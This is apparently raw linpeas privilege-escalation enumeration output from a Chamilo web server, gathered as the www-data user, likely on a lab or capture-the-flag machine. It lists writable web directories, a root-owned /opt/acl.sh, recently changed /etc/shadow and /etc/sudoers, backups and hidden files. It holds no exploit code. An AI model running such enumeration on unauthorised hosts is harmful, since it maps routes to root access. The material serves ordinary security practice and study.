/var/www/chamilo/app/Resources/public/assets/MathJax/extensions
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/AssistiveMML.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/CHTML-preview.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/FontWarnings.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/HTML-CSS
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/HTML-CSS/handle-floats.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/HelpDialog.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/MatchWebFonts.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/MathEvents.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/MathML
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/MathML/content-mathml.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/MathML/mml3.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/MathMenu.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/MathZoom.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/Safe.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/TeX
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/TeX/AMScd.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/TeX/AMSmath.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/TeX/AMSsymbols.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/TeX/HTML.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/TeX/action.js
#)You_can_write_even_more_files_inside_last_directory

/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/TeX/mhchem3/mhchem.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/TeX/newcommand.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/TeX/noErrors.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/TeX/noUndefined.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/TeX/text-macros.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/TeX/unicode.js
#)You_can_write_even_more_files_inside_last_directory

/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/accessibility-menu.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/auto-collapse.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/collapsible.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/explorer.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/invalid_keypress.ogg
#)You_can_write_even_more_files_inside_last_directory

/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/mathmaps/en
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/mathmaps/en/functions
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/mathmaps/en/functions/algebra.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/mathmaps/en/functions/elementary.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/mathmaps/en/functions/hyperbolic.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/mathmaps/en/functions/trigonometry.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/mathmaps/en/symbols
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/mathmaps/en/symbols/greek-capital.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/mathmaps/en/symbols/greek-mathfonts-bold.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/mathmaps/en/symbols/greek-mathfonts-italic.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/mathmaps/en/symbols/greek-mathfonts-sans-serif-bold.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/mathmaps/en/symbols/greek-scripts.js
#)You_can_write_even_more_files_inside_last_directory

/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/mathmaps/en/units
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/mathmaps/en/units/energy.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/mathmaps/en/units/length.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/mathmaps/en/units/memory.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/mathmaps/en/units/other.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/mathmaps/en/units/speed.js
#)You_can_write_even_more_files_inside_last_directory

/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/mathmaps/es
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/mathmaps/es/functions
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/mathmaps/es/functions/algebra.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/mathmaps/es/functions/elementary.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/mathmaps/es/functions/hyperbolic.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/mathmaps/es/functions/trigonometry.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/mathmaps/es/symbols
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/mathmaps/es/symbols/greek-capital.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/mathmaps/es/symbols/greek-mathfonts-bold.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/mathmaps/es/symbols/greek-mathfonts-italic.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/mathmaps/es/symbols/greek-mathfonts-sans-serif-bold.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/mathmaps/es/symbols/greek-scripts.js
#)You_can_write_even_more_files_inside_last_directory

/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/mathmaps/es/units
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/mathmaps/es/units/energy.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/mathmaps/es/units/length.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/mathmaps/es/units/memory.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/mathmaps/es/units/other.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/mathmaps/es/units/speed.js
#)You_can_write_even_more_files_inside_last_directory

/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/mathmaps/mathmaps_ie.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/semantic-enrich.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/a11y/wgxpath.install.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/asciimath2jax.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/fast-preview.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/jsMath2jax.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/mml2jax.js
/var/www/chamilo/app/Resources/public/assets/MathJax/extensions/tex2jax.js
#)You_can_write_even_more_files_inside_last_directory

/var/www/chamilo/app/Resources/public/assets/MathJax/fonts
/var/www/chamilo/app/Resources/public/assets/MathJax/fonts/HTML-CSS
/var/www/chamilo/app/Resources/public/assets/MathJax/fonts/HTML-CSS/Asana-Math
/var/www/chamilo/app/Resources/public/assets/MathJax/fonts/HTML-CSS/Asana-Math/OFL.txt
/var/www/chamilo/app/Resources/public/assets/MathJax/fonts/HTML-CSS/Asana-Math/eot
/var/www/chamilo/app/Resources/public/assets/MathJax/fonts/HTML-CSS/Asana-Math/eot/AsanaMathJax_Alphabets-Regular.eot
/var/www/chamilo/app/Resources/public/assets/MathJax/fonts/HTML-CSS/Asana-Math/eot/AsanaMathJax_Arrows-Regular.eot
/var/www/chamilo/app/Resources/public/assets/MathJax/fonts/HTML-CSS/Asana-Math/eot/AsanaMathJax_DoubleStruck-Regular.eot
/var/www/chamilo/app/Resources/public/assets/MathJax/fonts/HTML-CSS/Asana-Math/eot/AsanaMathJax_Fraktur-Regular.eot
/var/www/chamilo/app/Resources/public/assets/MathJax/fonts/HTML-CSS/Asana-Math/eot/AsanaMathJax_Latin-Regular.eot
#)You_can_write_even_more_files_inside_last_directory

/var/www/chamilo/app/Resources/public/assets/MathJax/fonts/HTML-CSS/Asana-Math/otf
/var/www/chamilo/app/Resources/public/assets/MathJax/fonts/HTML-CSS/Asana-Math/otf/AsanaMathJax_Alphabets-Regular.otf
/var/www/chamilo/app/Resources/public/assets/MathJax/fonts/HTML-CSS/Asana-Math/otf/AsanaMathJax_Arrows-Regular.otf
/var/www/chamilo/app/Resources/public/assets/MathJax/fonts/HTML-CSS/Asana-Math/otf/AsanaMathJax_DoubleStruck-Regular.otf
/var/www/chamilo/app/Resources/public/assets/MathJax/fonts/HTML-CSS/Asana-Math/otf/AsanaMathJax_Fraktur-Regular.otf
/var/www/chamilo/app/Resources/public/assets/MathJax/fonts/HTML-CSS/Asana-Math/otf/AsanaMathJax_Latin-Regular.otf
#)You_can_write_even_more_files_inside_last_directory

/var/www/chamilo/app/Resources/public/assets/MathJax/fonts/HTML-CSS/Asana-Math/woff
/var/www/chamilo/app/Resources/public/assets/MathJax/fonts/HTML-CSS/Asana-Math/woff/AsanaMathJax_Alphabets-Regular.woff
/var/www/chamilo/app/Resources/public/assets/MathJax/fonts/HTML-CSS/Asana-Math/woff/AsanaMathJax_Arrows-Regular.woff
/var/www/chamilo/app/Resources/public/assets/MathJax/fonts/HTML-CSS/Asana-Math/woff/AsanaMathJax_DoubleStruck-Regular.woff
/var/www/chamilo/app/Resources/public/assets/MathJax/fonts/HTML-CSS/Asana-Math/woff/AsanaMathJax_Fraktur-Regular.woff
/var/www/chamilo/app/Resources/public/assets/MathJax/fonts/HTML-CSS/Asana-Math/woff/AsanaMathJax_Latin-Regular.woff
#)You_can_write_even_more_files_inside_last_directory

/var/www/chamilo/app/Resources/public/assets/MathJax/fonts/HTML-CSS/Gyre-Pagella
/var/www/chamilo/app/Resources/public/assets/MathJax/fonts/HTML-CSS/Gyre-Pagella/GUST-FONT-LICENSE.txt
/var/www/chamilo/app/Resources/public/assets/MathJax/fonts/HTML-CSS/Gyre-Pagella/MANIFEST-GyrePagellaMathJax.txt
/var/www/chamilo/app/Resources/public/assets/MathJax/fonts/HTML-CSS/Gyre-Pagella/eot
/var/www/chamilo/app/Resources/public/assets/MathJax/fonts/HTML-CSS/Gyre-Pagella/eot/GyrePagellaMathJax_Alphabets-Regular.eot
/var/www/chamilo/app/Resources/public/assets/MathJax/fonts/HTML-CSS/Gyre-Pagella/eot/GyrePagellaMathJax_Arrows-Regular.eot
/var/www/chamilo/app/Resources/public/assets/MathJax/fonts/HTML-CSS/Gyre-Pagella/eot/GyrePagellaMathJax_DoubleStruck-Regular.eot
/var/www/chamilo/app/Resources/public/assets/MathJax/fonts/HTML-CSS/Gyre-Pagella/eot/GyrePagellaMathJax_Fraktur-Regular.eot
/var/www/chamilo/app/Resources/public/assets/MathJax/fonts/HTML-CSS/Gyre-Pagella/eot/GyrePagellaMathJax_Latin-Regular.eot
#)You_can_write_even_more_files_inside_last_directory

/var/www/chamilo/app/Resources/public/assets/MathJax/fonts/HTML-CSS/Gyre-Pagella/otf
/var/www/chamilo/app/Resources/public/assets/MathJax/fonts/HTML-CSS/Gyre-Pagella/otf/GyrePagellaMathJax_Alphabets-Regular.otf
/var/www/chamilo/app/Resources/public/assets/MathJax/fonts/HTML-CSS/Gyre-Pagella/otf/GyrePagellaMathJax_Arrows-Regular.otf

╔══════════╣ Interesting GROUP writable files (not in Home) (max 200)
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-files
  Group www-data:
/var/www/chamilo/app/cache/__CG__ChamiloCoreBundleEntityExtraField.php



                            ╔═════════════════════════╗
════════════════════════════╣ Other Interesting Files ╠════════════════════════════
                            ╚═════════════════════════╝
╔══════════╣ .sh files in path
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scriptbinaries-in-path
/usr/bin/rescan-scsi-bus.sh
/usr/bin/gettext.sh
You own the script: /tmp/linpeas.sh

╔══════════╣ Executable files potentially added by user (limit 70)
2024-06-07+14:54:14.5320123060 /usr/local/sbin/laurel
2024-06-05+11:58:36.2840015950 /opt/acl.sh
2024-01-20+18:06:59.3518544490 /etc/cloud/clean.d/99-installer
2024-01-20+18:06:19.0237830910 /etc/console-setup/cached_setup_terminal.sh
2024-01-20+18:06:19.0197829020 /etc/console-setup/cached_setup_keyboard.sh
2024-01-20+18:06:19.0197829020 /etc/console-setup/cached_setup_font.sh

╔══════════╣ Unexpected in /opt (usually empty)
total 12
drwxr-xr-x  2 root root 4096 Jun  7  2024 .
drwxr-xr-x 18 root root 4096 Jul  1  2024 ..
-rwxr-xr-x  1 root root  419 Jun  5  2024 acl.sh

╔══════════╣ Unexpected in root

╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/var/log/auth.log
/var/log/syslog
/var/log/kern.log
/var/log/journal/fd0d4dc0af924f53bb06d7f81b6fe30e/system.journal
/etc/shadow
/etc/crontab
/etc/sudoers
/etc/passwd


╔══════════╣ Files inside /home/www-data (limit 20)

╔══════════╣ Files inside others home (limit 20)
/var/www/chamilo/news_list.php
/var/www/chamilo/composer.lock
/var/www/chamilo/.codeclimate.yml
/var/www/chamilo/bin/doctrine.php
/var/www/chamilo/user.php
/var/www/chamilo/terms.php
/var/www/chamilo/documentation/installation_guide_es_ES.html
/var/www/chamilo/documentation/credits.html
/var/www/chamilo/documentation/installation_guide.html
/var/www/chamilo/documentation/dependencies.html
/var/www/chamilo/documentation/security.html
/var/www/chamilo/documentation/installation_guide_fr_FR.html
/var/www/chamilo/documentation/license.html
/var/www/chamilo/documentation/index.html
/var/www/chamilo/documentation/changelog.html
/var/www/chamilo/documentation/license.txt
/var/www/chamilo/documentation/default.css
/var/www/chamilo/documentation/optimization.html
/var/www/chamilo/documentation/readme.html
/var/www/chamilo/documentation/installation_guide_it_IT.html
grep: write error: Broken pipe

╔══════════╣ Searching installed mail applications

╔══════════╣ Mails (limit 50)

╔══════════╣ Backup folders
drwx------ 2 root root 4096 Jul  1  2024 /etc/lvm/backup
drwxr-xr-x 2 root root 4096 Sep 19 07:05 /var/backups
total 52
-rw-r--r-- 1 root root 36825 Jul  1  2024 apt.extended_states.0
-rw-r--r-- 1 root root  4039 Jul  1  2024 apt.extended_states.1.gz
-rw-r--r-- 1 root root  4011 May 31  2024 apt.extended_states.2.gz
-rw-r--r-- 1 root root  4353 Jan 20  2024 apt.extended_states.3.gz


╔══════════╣ Backup files (limited 100)
-rwxr-xr-x 1 www-data www-data 9610 Aug 31  2023 /var/www/chamilo/main/coursecopy/import_backup.php
-rwxr-xr-x 1 www-data www-data 4112 Aug 31  2023 /var/www/chamilo/main/coursecopy/create_backup.php
-rw-r--r-- 1 root root 0 Aug 10  2023 /var/lib/systemd/deb-systemd-helper-enabled/timers.target.wants/dpkg-db-backup.timer
-rw-r--r-- 1 root root 61 Jun  7  2024 /var/lib/systemd/deb-systemd-helper-enabled/dpkg-db-backup.timer.dsh-also
-rw-r--r-- 1 root root 2403 Aug 10  2023 /etc/apt/sources.list.curtin.old
-rwxr-xr-x 1 root root 3025 May 25  2024 /usr/bin/wsrep_sst_backup
-rwxr-xr-x 1 root root 52401 May 25  2024 /usr/bin/wsrep_sst_mariabackup
-rwxr-xr-x 1 root root 2196 Feb 23  2024 /usr/libexec/dpkg/dpkg-db-backup
-rw-r--r-- 1 root root 355 May 25  2024 /usr/share/man/man1/wsrep_sst_backup.1.gz
-rw-r--r-- 1 root root 347 May 25  2024 /usr/share/man/man1/wsrep_sst_mariabackup.1.gz
-rw-r--r-- 1 root root 2747 Feb 16  2022 /usr/share/man/man8/vgcfgbackup.8.gz
-rw-r--r-- 1 root root 7867 Jul 16  1996 /usr/share/doc/telnet/README.old.gz
-rw-r--r-- 1 root root 416107 Dec 21  2020 /usr/share/doc/manpages/Changes.old.gz
-rwxr-xr-x 1 root root 226 Feb 17  2020 /usr/share/byobu/desktop/byobu.desktop.old
-rw-r--r-- 1 root root 11849 Jul  1  2024 /usr/share/info/dir.old
-rw-r--r-- 1 root root 13113 Jun 10  2024 /usr/lib/modules/5.15.0-113-generic/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 10849 Jun 10  2024 /usr/lib/modules/5.15.0-113-generic/kernel/drivers/power/supply/wm831x_backup.ko
-rw-r--r-- 1 root root 1423 Jan 20  2024 /usr/lib/python3/dist-packages/sos/report/plugins/__pycache__/ovirt_engine_backup.cpython-310.pyc
-rw-r--r-- 1 root root 1802 Jul 20  2023 /usr/lib/python3/dist-packages/sos/report/plugins/ovirt_engine_backup.py
-rw-r--r-- 1 root root 147 Dec  5  2021 /usr/lib/systemd/system/dpkg-db-backup.service
-rw-r--r-- 1 root root 138 Dec  5  2021 /usr/lib/systemd/system/dpkg-db-backup.timer
-rw-r--r-- 1 root root 44008 Dec  5  2023 /usr/lib/x86_64-linux-gnu/open-vm-tools/plugins/vmsvc/libvmbackup.so
-rwxr-xr-x 1 root root 1086 Oct 31  2021 /usr/src/linux-headers-5.15.0-113/tools/testing/selftests/net/tcp_fastopen_backup_key.sh

╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found /var/lib/PackageKit/transactions.db: SQLite 3.x database, last written using SQLite version 3037002, file counter 5, database pages 8, cookie 0x4, schema 4, UTF-8, version-valid-for 5
Found /var/lib/command-not-found/commands.db: SQLite 3.x database, last written using SQLite version 3037002, file counter 5, database pages 828, cookie 0x4, schema 4, UTF-8, version-valid-for 5
Found /var/www/chamilo/vendor/szymach/c-pchart/resources/barcode/128B.db: ASCII text
Found /var/www/chamilo/vendor/szymach/c-pchart/resources/barcode/39.db: ASCII text

 -> Extracting tables from /var/lib/PackageKit/transactions.db (limit 20)
 -> Extracting tables from /var/lib/command-not-found/commands.db (limit 20)

╔══════════╣ Web files?(output limit)
/var/www/:
total 16K
drwxr-xr-x  4 root     root     4.0K Jun  7  2024 .
drwxr-xr-x 13 root     root     4.0K Jun  7  2024 ..
drwxr-xr-x 12 www-data www-data 4.0K Sep 19 07:03 chamilo
drwxr-xr-x  7 www-data www-data 4.0K Jun  7  2024 html

/var/www/chamilo:
total 824K
drwxr-xr-x 12 www-data www-data 4.0K Sep 19 07:03 .

╔══════════╣ All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-r--r-- 1 root root 0 Sep 19 06:34 /run/network/.ifstate.lock
-rwxr-xr-x 1 www-data www-data 2545 Aug 31  2023 /var/www/chamilo/.codeclimate.yml
-rwxr-xr-x 1 www-data www-data 3085 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/.thumbs/.computer.jpg
-rwxr-xr-x 1 www-data www-data 2943 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/.thumbs/.emot_wink.jpg
-rwxr-xr-x 1 www-data www-data 3209 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/.thumbs/.book_highlight.jpg
-rwxr-xr-x 1 www-data www-data 89 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/.thumbs/.silhouette.png
-rwxr-xr-x 1 www-data www-data 3050 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/.thumbs/.world.jpg
-rwxr-xr-x 1 www-data www-data 4066 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/.thumbs/.bookcase.jpg
-rwxr-xr-x 1 www-data www-data 2500 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/.thumbs/.redlight.jpg
-rwxr-xr-x 1 www-data www-data 2963 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/.thumbs/.presentation.jpg
-rwxr-xr-x 1 www-data www-data 3660 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/.thumbs/.board.jpg
-rwxr-xr-x 1 www-data www-data 2751 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/.thumbs/.female.jpg
-rwxr-xr-x 1 www-data www-data 2997 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/.thumbs/.maths.jpg
-rwxr-xr-x 1 www-data www-data 2609 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/.thumbs/.note.jpg
-rwxr-xr-x 1 www-data www-data 2499 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/.thumbs/.idea.jpg
-rwxr-xr-x 1 www-data www-data 2791 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/.thumbs/.emot_neutral.jpg
-rwxr-xr-x 1 www-data www-data 3083 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/.thumbs/.interaction.jpg
-rwxr-xr-x 1 www-data www-data 8592 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/.thumbs/.pencil.png
-rwxr-xr-x 1 www-data www-data 8755 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/.thumbs/.logo_dokeos.png
-rwxr-xr-x 1 www-data www-data 3123 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/.thumbs/.speech.jpg
-rwxr-xr-x 1 www-data www-data 3568 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/.thumbs/.homework.jpg
-rwxr-xr-x 1 www-data www-data 3481 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/.thumbs/.science.jpg
-rwxr-xr-x 1 www-data www-data 3876 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/.thumbs/.geometry.jpg
-rwxr-xr-x 1 www-data www-data 3658 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/.thumbs/.mechanism.jpg
-rwxr-xr-x 1 www-data www-data 2905 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/.thumbs/.book.jpg
-rwxr-xr-x 1 www-data www-data 2476 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/.thumbs/.male.jpg
-rwxr-xr-x 1 www-data www-data 2519 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/.thumbs/.mouse.jpg
-rwxr-xr-x 1 www-data www-data 2906 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/.thumbs/.emot_sad.jpg
-rwxr-xr-x 1 www-data www-data 2995 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/.thumbs/.emot_happy.jpg
-rwxr-xr-x 1 www-data www-data 2762 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/.thumbs/.newspaper.jpg
-rwxr-xr-x 1 www-data www-data 3861 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/.thumbs/.time.jpg
-rwxr-xr-x 1 www-data www-data 9187 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/.thumbs/.twopeople.png
-rwxr-xr-x 1 www-data www-data 2186 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/.thumbs/.tutorial.jpg
-rwxr-xr-x 1 www-data www-data 2355 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/.thumbs/.write.jpg
-rwxr-xr-x 1 www-data www-data 2578 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/diagrams/animated/.thumbs/.anim_rome.gif
-rwxr-xr-x 1 www-data www-data 977 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/diagrams/animated/.thumbs/.anim_pendul.gif
-rwxr-xr-x 1 www-data www-data 472 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/diagrams/animated/.thumbs/.anim_corriolis.gif
-rwxr-xr-x 1 www-data www-data 2501 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/diagrams/animated/.thumbs/.anim_yugoslavia.gif
-rwxr-xr-x 1 www-data www-data 2535 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/diagrams/animated/.thumbs/.anim_loco.gif
-rwxr-xr-x 1 www-data www-data 1680 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/diagrams/animated/.thumbs/.anim_electrolysis.gif
-rwxr-xr-x 1 www-data www-data 726 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/diagrams/animated/.thumbs/.anim_wave_frequency.gif
-rwxr-xr-x 1 www-data www-data 2066 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/diagrams/animated/.thumbs/.anim_japanese.gif
-rwxr-xr-x 1 www-data www-data 3325 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/diagrams/animated/.thumbs/.anim_twostroke.gif
-rwxr-xr-x 1 www-data www-data 7902 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/diagrams/.thumbs/.yalta_1.png
-rwxr-xr-x 1 www-data www-data 1736 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/diagrams/.thumbs/.distance.png
-rwxr-xr-x 1 www-data www-data 2829 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/diagrams/.thumbs/.pc.jpg
-rwxr-xr-x 1 www-data www-data 3255 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/diagrams/.thumbs/.synapse.jpg
-rwxr-xr-x 1 www-data www-data 8067 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/diagrams/.thumbs/.dokeos_stones_external.png
-rwxr-xr-x 1 www-data www-data 1796 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/diagrams/.thumbs/.velocity.jpg
-rwxr-xr-x 1 www-data www-data 15185 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/diagrams/.thumbs/.head_olfactory_nerve.png
-rwxr-xr-x 1 www-data www-data 9770 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/diagrams/.thumbs/.brain.png
-rwxr-xr-x 1 www-data www-data 1947 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/diagrams/.thumbs/.receiver.jpg
-rwxr-xr-x 1 www-data www-data 3406 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/diagrams/.thumbs/.spectre.jpg
-rwxr-xr-x 1 www-data www-data 4290 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/diagrams/.thumbs/.radiograph.png
-rwxr-xr-x 1 www-data www-data 1785 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/diagrams/.thumbs/.pythagore.jpg
-rwxr-xr-x 1 www-data www-data 2150 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/diagrams/.thumbs/.precession.jpg
-rwxr-xr-x 1 www-data www-data 2719 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/diagrams/.thumbs/.lightbulb.jpg
-rwxr-xr-x 1 www-data www-data 5060 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/diagrams/.thumbs/.gearbox.jpg
-rwxr-xr-x 1 www-data www-data 3362 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/diagrams/.thumbs/.coccidioides.jpg
-rwxr-xr-x 1 www-data www-data 10148 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/diagrams/.thumbs/.constitution_1.png
-rwxr-xr-x 1 www-data www-data 4644 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/diagrams/.thumbs/.dokeos_stones.png
-rwxr-xr-x 1 www-data www-data 2231 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/diagrams/.thumbs/.asus-eee-pc.jpg
-rwxr-xr-x 1 www-data www-data 5740 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/diagrams/.thumbs/.accident_1.png
-rwxr-xr-x 1 www-data www-data 7032 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/diagrams/.thumbs/.alaska_chart.png
-rwxr-xr-x 1 www-data www-data 2366 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/diagrams/.thumbs/.oilwell.jpg
-rwxr-xr-x 1 www-data www-data 7886 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/diagrams/.thumbs/.waterloo.png
-rwxr-xr-x 1 www-data www-data 5195 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/diagrams/.thumbs/.halleffect.jpg
-rwxr-xr-x 1 www-data www-data 3519 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/diagrams/.thumbs/.elearning_project.png
-rwxr-xr-x 1 www-data www-data 6600 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/diagrams/.thumbs/.europecouncilorange200_1.png
-rwxr-xr-x 1 www-data www-data 2128 Aug 31  2023 /var/www/chamilo/main/default_course_document/images/diagrams/.thumbs/.barbitursyra.jpg
grep: write error: Broken pipe
grep: write error: Broken pipe

╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rw-r--r-- 1 www-data www-data 42263 Sep 19 07:04 /tmp/linpeas.txt
-rwxr-xr-x 1 www-data www-data 840139 May  1 04:37 /tmp/linpeas.sh

╔══════════╣ Searching passwords in history files
/var/www/chamilo/main/exercise/exercise_history.php: * @author Olivier Brouckaert, original author
/var/www/chamilo/main/exercise/exercise_history.php: * @author Denes Nagy, HotPotatoes integration
/var/www/chamilo/main/exercise/exercise_history.php: * @author Wolfgang Schneider, code/html cleanup
/var/www/chamilo/vendor/phpexiftool/exiftool/html/ancient_history.html:<li>No longer trim trailing spaces from arguments in -@ argfiles
/var/www/chamilo/vendor/phpexiftool/exiftool/html/ancient_history.html:<li>Added -password option for processing password-protected PDF documents
/var/www/chamilo/vendor/phpexiftool/exiftool/html/ancient_history.html:    <li>Added Password option
/var/www/chamilo/vendor/phpexiftool/exiftool/html/ancient_history.html:<li>Improved -@ option to allow a UTF-8 BOM at the start of the input file
/var/www/chamilo/vendor/phpexiftool/exiftool/html/ancient_history.html:<li>Changed -@ to insert arguments at the current position in the command line
